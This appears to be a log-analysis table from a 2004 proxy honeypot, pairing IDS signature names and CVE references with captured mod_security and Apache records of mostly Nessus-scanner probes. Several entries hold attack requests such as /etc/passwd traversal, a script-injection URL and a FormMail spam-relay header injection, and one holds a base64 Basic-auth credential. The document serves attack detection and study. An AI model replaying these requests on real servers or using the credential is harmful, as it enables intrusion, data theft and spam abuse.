862 | CA-1996-11 | attempted-recon | WEB-CGI csh access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/csh HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csh ---------------------------------------- GET /cgi-bin/csh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
865 | CA-1996-11 | attempted-recon | WEB-CGI ksh access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/ksh HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ksh ---------------------------------------- GET /cgi-bin/ksh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
867 | Nessus 10295 CAN-1999-1970 BID1808 | attempted-recon | WEB-CGI visadmin.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:31 2004] "GET /cgi-bin/visadmin.exe HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/visadmin.exe] for 50000 ms ---------------------------------------- GET /cgi-bin/visadmin.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/visadmin\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
869 | CAN-1999-1178 | attempted-recon | WEB-CGI dumpenv.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:00 2004] "GET /cgi-bin/dumpenv.pl HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/dumpenv.pl ---------------------------------------- GET /cgi-bin/dumpenv.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
872 | CA-1996-11 | attempted-recon | WEB-CGI tcsh access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/tcsh HTTP/1.1" 403 296 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/tcsh ---------------------------------------- GET /cgi-bin/tcsh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
873 | arachNIDS 227 BID2300 CVE-1999-0236 | attempted-recon | WEB-CGI scriptalias access | Request: 67.125.134.117 - - [Thu Mar 11 05:10:37 2004] "GET http:///www.christinamodel.com/members/index.html HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/www.christinamodel.com/members/index.html] for 50000 ms ---------------------------------------- GET http:///www.christinamodel.com/members/index.html HTTP/1.0 Accept: */* Accept-Language: en-us,en;q=0.5 Authorization: Basic cHIwdDNzdDpsb3Zlc3lvdQ== Host: Pragma: no-cache Referer: Http://www.christinamodel.com/members/index.html User-Agent: Mozilla/4.7 ( compatible; [jp]; Windows 98; DigiExt ) mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
875 | Nessus 10008 CVE-1999-0178 arachNIDS 231 BID2078 | attempted-recon | WEB-CGI win-c-sample.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:47:36 2004] "GET /cgi-shl/win-c-sample.exe HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/cgi-shl/win-c-sample.exe] for 50000 ms ---------------------------------------- GET /cgi-shl/win-c-sample.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/win-c-sample\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
882 | | attempted-recon | WEB-CGI calendar access | Request: 218.4.51.134 - - [Thu Mar 11 09:09:48 2004] "GET http://www.orbitz.com/img/icons/calendar.gif HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.orbitz.com/img/icons/calendar.gif] for 50000 ms ---------------------------------------- GET http://www.orbitz.com/img/icons/calendar.gif HTTP/1.0 Accept: */* Accept-Language: zh-cn Cookie: OSC=AQymyFJOpw!1406451595; OrbitzID=10790141182870; OrbitzRegistration=N,0,0,0 Host: www.orbitz.com If-Modified-Since: Fri, 27 Jun 2003 21:02:04 GMT If-None-Match: "64c07e-176-3efcb0cc" Proxy-Connection: Keep-Alive Referer: http://www.orbitz.com/?referralcode=?s User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/calendar" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
884 | arachNIDS 226 CVE-1999-0172 BID1187 Nessus 10076 Nessus 10782 | web-application-activity | WEB-CGI formmail access | Request: 67.83.151.132 - - [Wed Mar 10 02:58:00 2004] "POST http://www.buckhickman.co.uk/cgi-bin/FormMail.pl HTTP/1.1" 200 578 Handler: proxy-server Error: mod_security: Invalid character detected [13] ---------------------------------------- POST http://www.buckhickman.co.uk/cgi-bin/FormMail.pl HTTP/1.1 Accept: */* Connection: Close Content-Length: 407 Content-Type: application/x-www-form-urlencoded Host: www.buckhickman.co.uk Proxy-Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705) mod_security-action: 200 email=adelinaeo@thenetanywhere.com&realname=adelinaeo@thenetanywhere.com&recipient=<aazual8@aol.com>www.buckhickman.co.uk%2C&subject=11%3A56%3A53%20PM%20Live!++++++++++++d3v39&15=%0D%0A%0D%0A%0A%0A%0A%0A%0A%0A%0D%0Anhs%0D%0A%0D%0Aaazual8%20Visit%20http%3A%2F%2Fconnect.to%2Ffriendscams%20to%20talk%20to%20these%20girls%20LIVE!%0D%0A%0A%0A%0A%0A%0D%0A11%3A56%3A53%20PM%0D%0A3%2F9%2F2004%0A%0A%0A%0A%0A%0A5y3u HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
885 | CA-1996-11 CAN-1999-0509 | web-application-activity | WEB-CGI bash access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/bash HTTP/1.1" 403 296 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bash ---------------------------------------- GET /cgi-bin/bash HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
889 | securityfocus BID491 | attempted-recon | WEB-CGI ppdscgi.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:56 2004] "GET /cgi-bin/ppdscgi.exe HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ppdscgi.exe ---------------------------------------- GET /cgi-bin/ppdscgi.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
890 | scn BID5286 CAN-2002-0710 | attempted-recon | WEB-CGI sendform.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:41 2004] "GET /cgi-bin/sendform.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/sendform.cgi ---------------------------------------- GET /cgi-bin/sendform.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=35 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
892 | CVE-1999-0066 BID719 | attempted-recon | WEB-CGI AnyForm2 access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:04 2004] "GET /cgi-bin/AnyForm2 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/AnyForm2] for 50000 ms ---------------------------------------- GET /cgi-bin/AnyForm2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/AnyForm2" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
895 | CVE-2000-0382 BID1179 | attempted-recon | WEB-CGI redirect access | Request: 220.175.18.42 - - [Tue Mar 9 22:47:40 2004] "GET http://65.17.208.131/search/search/redirect.php?s=5460953&r=1&l=1 HTTP/1.0" 302 0 Handler: proxy-server ---------------------------------------- GET http://65.17.208.131/search/search/redirect.php?s=5460953&r=1&l=1 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Encoding: deflate Accept-Language: en Cookie: stres=1; fc=SXJ3wn3VYaM Host: 65.17.208.131 Proxy-Connection: Keep-Alive Referer: http://www.searchlikecrazy.com/cgi-bin/smartsearch.cgi?keywords=Web+Design%20&username=arongyi User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2) mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 302 Found Accept-Ranges: bytes X-Powered-By: PHP/4.2.2 Location: http://www.kanoodle.com/clickthrough.cool?position=7001&tid=bhngbnnobonpbgnkbknpzqrdxbxoyx&bid=0.09&eid=1&id=77810869&query=web%20design&clickid=23442688&UNQ=00107889044985920592&subid=10470 Content-Length: 0 Content-Type: text/html; charset=ISO-8859-1 X-Cache: MISS from www.testproxy.net Connection: close |
896 | Nessus 10610 CAN-2001-0214 BID2370 | web-application-activity | WEB-CGI way-board access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 403 307 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/way-board ---------------------------------------- GET /way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
899 | CAN-2001-0272 BID2504 | web-application-attack | WEB-CGI Amaya templates sendtemp.pl directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:46 2004] "GET /cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/sendtemp.pl ---------------------------------------- GET /cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
900 | Nessus 10616 BID2362 CAN-2001-0211 | web-application-attack | WEB-CGI webspirs.cgi directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:53 2004] "GET /webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webspirs.cgi ---------------------------------------- GET /webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
902 | CAN-2001-0302 | attempted-recon | WEB-CGI tstisapi.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:47:23 2004] "GET /isapi/tstisapi.dll HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/isapi/tstisapi.dll] for 50000 ms ---------------------------------------- GET /isapi/tstisapi.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "tstisapi\.dll" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
908 | CVE-2000-0538 | attempted-recon | WEB-COLDFUSION administrator access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:20 2004] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/CFIDE/administrator/index.cfm] for 50000 ms ---------------------------------------- GET /CFIDE/administrator/index.cfm HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/cfide/administrator/index\.cfm" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
911 | BID550 CVE-1999-0455 | attempted-recon | WEB-COLDFUSION exprcalc access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:54 2004] "GET /cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini HTTP/1.1" 403 311 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cfdocs ---------------------------------------- GET /cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
937 | BID2144 | web-application-activity | WEB-FRONTPAGE _vti_rpc access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:41 2004] "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [13] ---------------------------------------- POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0 Accept: */* Connection: Keep-Alive Content-Length: 58 Content-Type: application/x-www-form-urlencoded Date: Mon, 23 Mar 2003 00:00:15 GMT Host: 192.168.1.103 MIME-Version: 1.0 User-Agent: MSFrontPage/4.0 X-Vermeer-Content-Type: application/x-www-form-urlencoded mod_security-action: 200 method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
951 | Nessus 10078 CVE-1999-0386 | web-application-activity | WEB-FRONTPAGE authors.pwd access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:40 2004] "GET /_vti_pvt/authors.pwd HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/authors\.pwd" at THE_REQUEST. ---------------------------------------- GET /_vti_pvt/authors.pwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/authors\.pwd" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
960 | | web-application-activity | WEB-FRONTPAGE service.stp access | Request: 213.66.16.242 - - [Sat Mar 13 18:07:03 2004] "GET http://www.hypnogirls.com/_vti_pvt/service.stp HTTP/1.0" 302 280 Handler: proxy-server Error: mod_security: Warning. Pattern match "/_vti_pvt/service\.stp" at THE_REQUEST. ---------------------------------------- GET http://www.hypnogirls.com/_vti_pvt/service.stp HTTP/1.0 Accept: */*, text/html mod_security-message: Warning. Pattern match "/_vti_pvt/service\.stp" at THE_REQUEST. HTTP/1.0 302 Found Warning: Subject to Monitoring Location: http://www.hypnogirls.com Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Connection: close |
962 | BID1174 BID1608 CAN-2000-0709 CAN-2000-0413 Nessus 10405 | web-application-activity | WEB-FRONTPAGE shtml.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:48 2004] "GET /_vti_bin/shtml.exe/<script>alert(document.domain)</script> HTTP/1.1" 403 354 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_bin ---------------------------------------- GET /_vti_bin/shtml.exe/<script>alert(document.domain)</script> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
966 | arachNIDS 248 CAN-2000-0153 BID989 | web-application-attack | WEB-FRONTPAGE .... request | Request: 217.160.165.173 - - [Fri Mar 12 22:38:47 2004] "GET /................../config.sys HTTP/1.1" 403 313 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/.................. ---------------------------------------- GET /................../config.sys HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
967 | ms00-025 arachNIDS 271 CVE-2000-0260 BID1108 | web-application-activity | WEB-FRONTPAGE dvwssr.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:19 2004] "GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.1" 404 308 Handler: (null) Error: mod_security: Warning. Pattern match "/dvwssr\.dll" at THE_REQUEST. ---------------------------------------- GET /_vti_bin/_vti_aut/dvwssr.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/_vti_bin/" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
971 | arachNIDS 533 CAN-2001-0241 | web-application-activity | WEB-IIS ISAPI .printer access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:26 2004] "GET /NULL.printer HTTP/1.1" 404 292 Handler: (null) Error: mod_security: Warning. Pattern match "\.printer" at THE_REQUEST. ---------------------------------------- GET /NULL.printer HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.printer" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
972 | CAN-1999-0253 BID1814 | web-application-activity | WEB-IIS %2E-asp access | Request: 218.56.8.160 - - [Wed Mar 10 23:38:43 2004] "GET http://www.xuppa.com/cgi-local/click.cgi?o=97087&k=Films&partnerid=boopin&c=_b9pt_&pro=12835&srch=Films&pos=2&oid=12835&cthru=http%3A%2F%2Fpartners%2Emygeek%2Ecom%2Fpresults%2Ejsp%3Fpartnerid%3D%39%38%36%38%39%26vendorId%3D%39%37%30%38%37%26type%3D%31%26code%3D%30%26rate%3D%38%34%35%33%36%32%33%36%32%26cr%3D%38%34%35%33%36%32%33%36%32%26domain%3Dtrack%2Edid%2Dit%2Ecom%26query%3D%31%30%37%38%39%37%39%38%36%32%37%35%32%25%33A%25%33A%36%38%2E%34%38%2E%31%30%36%2E%31%30%39%25%33A%25%33AFilms%26url%3Dhttp%25%33A%25%32F%25%32Fwww%2Elooksmart%2Ecom%25%32Fog%25%32Fpr%25%33DPsr%25%33Bro%25%33D%32%25%33Brc%25%33D%34%25%33Bla%25%33D%32%31%38%30%32%35%25%33Blm%25%33D%31%32%31%30%36%32%25%33Bli%25%33D%31%30%32%32%37%32%36%31%32%25%33Bed%25%33D%32%30%30%33%30%38%31%33%25%33Bii%25%33D%38%30%36%34%2E%37%34%35%38%2E%34%30%34fe%36e%39%2E%36%35%33%35%25%33Bpn%25%33D%25%33Bto%25%33D%25%33Btc%25%33D%34%25%33Bpo%25%33D%32%25%33Bpc%25%33D%34%25%33Bpi%25%33Dlzd%25%33Bts%25%33D%25%37Chttp%25%33A%25%32F%25%32Ftrack%2Edid%2Dit%2Ecom%25%32Fn%25%33Flid%25%33D%36%35%37%38%30%38%37%25%32%36tid%25%33D%33edb%39%35%31%31%36b%36cd%25%32%36url%25%33Dhttp%25%33A%25%32F%25%32Fwww%2Eassociatedbag%2Ecom%25%32Fcategory%2Easp%25%33Fcatalog%25%32%35%35Fname%25%33DAssociatedBagCatalog%25%32%36class%25%33DFLM%25%32%36parent%25%33D%25%32%36category%25%32%35%35Fname%25%33DFLM%25%32%36Page%25%33D%31%3Ab%30%2E%30%33 HTTP/1.1" 302 938 Handler: proxy-server ---------------------------------------- GET 
http://www.xuppa.com/cgi-local/click.cgi?o=97087&k=Films&partnerid=boopin&c=_b9pt_&pro=12835&srch=Films&pos=2&oid=12835&cthru=http%3A%2F%2Fpartners%2Emygeek%2Ecom%2Fpresults%2Ejsp%3Fpartnerid%3D%39%38%36%38%39%26vendorId%3D%39%37%30%38%37%26type%3D%31%26code%3D%30%26rate%3D%38%34%35%33%36%32%33%36%32%26cr%3D%38%34%35%33%36%32%33%36%32%26domain%3Dtrack%2Edid%2Dit%2Ecom%26query%3D%31%30%37%38%39%37%39%38%36%32%37%35%32%25%33A%25%33A%36%38%2E%34%38%2E%31%30%36%2E%31%30%39%25%33A%25%33AFilms%26url%3Dhttp%25%33A%25%32F%25%32Fwww%2Elooksmart%2Ecom%25%32Fog%25%32Fpr%25%33DPsr%25%33Bro%25%33D%32%25%33Brc%25%33D%34%25%33Bla%25%33D%32%31%38%30%32%35%25%33Blm%25%33D%31%32%31%30%36%32%25%33Bli%25%33D%31%30%32%32%37%32%36%31%32%25%33Bed%25%33D%32%30%30%33%30%38%31%33%25%33Bii%25%33D%38%30%36%34%2E%37%34%35%38%2E%34%30%34fe%36e%39%2E%36%35%33%35%25%33Bpn%25%33D%25%33Bto%25%33D%25%33Btc%25%33D%34%25%33Bpo%25%33D%32%25%33Bpc%25%33D%34%25%33Bpi%25%33Dlzd%25%33Bts%25%33D%25%37Chttp%25%33A%25%32F%25%32Ftrack%2Edid%2Dit%2Ecom%25%32Fn%25%33Flid%25%33D%36%35%37%38%30%38%37%25%32%36tid%25%33D%33edb%39%35%31%31%36b%36cd%25%32%36url%25%33Dhttp%25%33A%25%32F%25%32Fwww%2Eassociatedbag%2Ecom%25%32Fcategory%2Easp%25%33Fcatalog%25%32%35%35Fname%25%33DAssociatedBagCatalog%25%32%36class%25%33DFLM%25%32%36parent%25%33D%25%32%36category%25%32%35%35Fname%25%33DFLM%25%32%36Page%25%33D%31%3Ab%30%2E%30%33 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en Cache-Control: no-cache Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Host: www.xuppa.com Referer: http://boopin.com/s.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) mod_security-message: Access denied with code 200. Pattern match "\.asp" at THE_REQUEST. 
HTTP/1.1 302 Found Set-Cookie: ks12835=Filmshttp%3A%2F%2Fpartners.mygeek.com%2Fpresults.jsp%3Fpartnerid%3D98689%26vendorId%3D97087%26type%3D1%26code%3D0%26rate%3D845362362%26cr%3D845362362%26domain%3Dtrack.did-it.com%26query%3D1078979862752%253A%253A192.168.1.103%253A%253AFilms%26url%3Dhttp%253A%252F%252Fwww.looksmart.com%252Fog%252Fpr%253DPsr%253Bro%253D2%253Brc%253D4%253Bla%253D218025%253Blm%253D121062%253Bli%253D102272612%253Bed%253D20030813%253Bii%253D8064.7458.404fe6e9.6535%253Bpn%253D%253Bto%253D%253Btc%253D4%253Bpo%253D2%253Bpc%253D4%253Bpi%253Dlzd%253Bts%253D%257Chttp%253A%252F%252Ftrack.did-it.com%252Fn%253Flid%253D6578087%2526tid%253D3edb95116b6cd%2526url%253Dhttp%253A%252F%252Fwww.associatedbag.com%252Fcategory.asp%253Fcatalog%25255Fname%253DAssociatedBagCatalog%2526class%253DFLM%2526parent%253D%2526category%25255Fname%253DFLM%2526Page%253D1&1078979909&time&1078979909; domain=.xuppa.com; path=/; expires=Fri, 12-Mar-2004 04:38:29 GMT Location: http://partners.mygeek.com/presults.jsp?partnerid=98689&vendorId=97087&type=1&code=0&rate=845362362&cr=845362362&domain=track.did-it.com&query=1078979862752%3A%3A192.168.1.103%3A%3AFilms&url=http%3A%2F%2Fwww.looksmart.com%2Fog%2Fpr%3DPsr%3Bro%3D2%3Brc%3D4%3Bla%3D218025%3Blm%3D121062%3Bli%3D102272612%3Bed%3D20030813%3Bii%3D8064.7458.404fe6e9.6535%3Bpn%3D%3Bto%3D%3Btc%3D4%3Bpo%3D2%3Bpc%3D4%3Bpi%3Dlzd%3Bts%3D%7Chttp%3A%2F%2Ftrack.did-it.com%2Fn%3Flid%3D6578087%26tid%3D3edb95116b6cd%26url%3Dhttp%3A%2F%2Fwww.associatedbag.com%2Fcategory.asp%3Fcatalog%255Fname%3DAssociatedBagCatalog%26class%3DFLM%26parent%3D%26category%255Fname%3DFLM%26Page%3D1 Content-Type: text/plain Via: 1.1 www.xuppa.com X-Cache: MISS from www.xuppa.com, MISS from www.testproxy.net Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: 